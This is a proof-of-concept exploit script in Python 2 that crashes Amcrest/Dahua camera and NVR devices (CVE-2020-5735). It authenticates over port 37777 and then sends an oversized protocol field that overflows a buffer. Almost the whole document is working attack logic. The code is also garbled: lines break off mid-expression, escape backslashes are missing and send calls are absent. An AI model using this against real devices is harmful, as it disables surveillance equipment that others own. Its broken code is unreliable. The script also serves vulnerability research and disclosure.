# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash

import argparse
import hashlib
import socket
import struct
import sys
import md5
import re

## DDNS test functionality. Stack overflow via memcpy

def recv_response(sock):
# minimum size is 32 bytes
header = sock.recv(32)

# check we received enough data
if len(header) != 32:
print 'Invalid response. Too short'
return (False, '', '')

# extract the payload length field
length_field = header[4:8]
payload_length = struct.unpack_from('I', length_field)
payload_length = payload_length[0]

# uhm... lets be restrictive of accepted lengths
if payload_length < 0 or payload_length > 4096:
print 'Invalid response. Bad payload length'
return (False, header, '')

if (payload_length == 0):
return (True, header, '')

payload = sock.recv(payload_length)
if len(payload) != payload_length:
print 'Invalid response. Bad received length'
return (False, header, payload)

return (True, header, payload)

def sofia_hash(msg):
h = ""
m = hashlib.md5()
msg_md5 = m.digest()
for i in range(8):
n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
if n > 9:
if n > 35:
n += 61
n += 55
n += 0x30
h += chr(n)
return h

top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
required=True, help="The password to use")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("xa0x05x00x60x00x00x00x00" +
"x00x00x00x00x00x00x00x00" + # username hash
"x00x00x00x00x00x00x00x00" + # password hash
(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
print 'Failed to receive the challenge'
print challenge

# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+) Random:([0-9]+) ",
if seeds == None:
print 'Failed to extract realm and random seed.'
print challenge

realm = seeds.group(1)
random = seeds.group(2)

# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
random_hash = md5.new(args.username + ":" + random + ":" +
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +

challenge_resp = ("xa0x05x00x60x47x00x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00x00x00x00x00" +
"x05x02x00x08x00x00xa1xaa" +
args.username + "&&" + random_hash + final_hash)

(success, header, payload) = recv_response(sock)
if success == False or not header:
print 'Failed to receive the session id'

session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
print "Log in failed."

session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)

# firmware version
command = "Protocol: " + ("a" * 0x300) + " "
command_length = struct.pack("I", len(command))
firmware = ("x62x00x00x00" + command_length +
"x04x00x00x00x00x00x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00x00x00x00x00" +
(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
print "[!] Probably crashed the server."
print "[+] Attack failed."